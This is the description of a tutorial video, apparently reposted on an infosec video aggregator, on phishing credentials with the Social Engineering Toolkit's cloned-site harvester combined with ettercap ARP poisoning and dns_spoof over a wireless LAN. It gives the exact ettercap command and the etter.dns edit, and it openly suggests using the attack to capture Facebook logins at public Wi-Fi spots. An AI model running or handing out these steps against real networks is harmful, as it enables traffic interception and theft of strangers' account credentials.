Description: This is Video Four on using The Social Engineering Toolkit on Backtrack Linux & Kali Linux.
In this video i will show you how to use a credential harvester Attack using a Cloned Website and ettercap with dns_spoof.
We will be attacking victims over a LAN (Local Area Network)
However this is possible to do outside a network if you wanted to however i won't be explaining that in this video.
Programs Used:
Kali Linux
SET - Social Engineering Tool Kit
ettercap
dns_spoof
Browsers used: Google Chrome
Commands used:
nano /usr/share/ettercap/etter.dns
Command allows us to edit the etter.dns that we will be redirecting cloned website to our lan ip on the network.
ettercap -i wlan0 -T -q -P dns_spoof -M ARP:remote // //
Change the wlan0 to whatever you're wireless interface name using iwconfig or ifconfig
Take in mind this is being done over a wireless network.
This can be used to get logins for facebook if your at a public wireless place.
My websites:
http://zarabyte.com
http://matthewhknight.com
http://twitter.com/ZaraByte
http://facebook.com/ZaraByte
Tags: set , social engineering , social engineering toolkit , login stealing ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.